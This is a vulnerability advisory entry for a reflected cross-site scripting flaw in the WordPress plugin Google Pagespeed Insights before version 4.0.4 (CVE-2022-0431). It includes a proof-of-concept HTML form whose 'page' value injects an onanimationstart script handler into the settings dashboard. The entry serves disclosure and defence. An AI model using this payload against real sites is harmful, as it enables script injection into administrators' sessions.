Lucene search
Krzysztof ZającWPEX-ID:52BD94DF-8816-48FD-8788-38D045EB57CAHistoryMar 08, 2022 - 12:00 a.m.
Google Pagespeed Insights < 4.0.4 - Reflected Cross-Site Scripting
2022-03-0800:00:00
Krzysztof Zając
92
google pagespeed insights
reflected cross-site scripting
form input
vulnerability
exploit
EPSS
0.001
Percentile
30.0%
The plugin does not sanitise and escape various parameters before outputting them back in attributes in the plugin’s settings dashboard, leading to Reflected Cross-Site Scripting
<html>
<form action="https://example.com/wp-admin/tools.php?page=google-pagespeed-insights&render=options" method="POST">
<input type="text" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/) x'>
<input type="submit" value="Send">
</form>
</html>
Related
cnvd
cnvd
patchstack
patchstack
cve
cve
CVE-2022-0431
2022-04-04 16:15:09
wpvulndb
wpvulndb
Google Pagespeed Insights < 4.0.4 - Reflected Cross-Site Scripting
2022-03-08 00:00:00
nvd
nvd
CVE-2022-0431
2022-04-04 16:15:09
prion
prion
Cross site scripting
2022-04-04 16:15:00
cvelist
cvelist